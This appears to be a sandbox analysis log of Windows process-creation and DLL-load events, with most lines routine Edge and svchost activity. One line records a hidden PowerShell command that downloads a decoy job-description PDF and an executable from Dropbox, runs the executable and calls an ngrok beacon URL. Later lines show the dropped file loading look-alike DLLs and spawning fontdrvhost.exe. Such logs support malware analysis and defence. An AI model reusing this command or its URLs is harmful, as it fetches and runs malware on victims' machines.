                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7060 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7920 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8232 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:6Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6752 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\6d0157c6-3d7d-48ab-8ec3-f1e0d1f3d02e.pdf
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2144,i,12226870336135791064,6646612057330191858,262144 /prefetch:3
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe "C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe"
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: wtsapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: k7rn7l32.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: ntd3ll.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
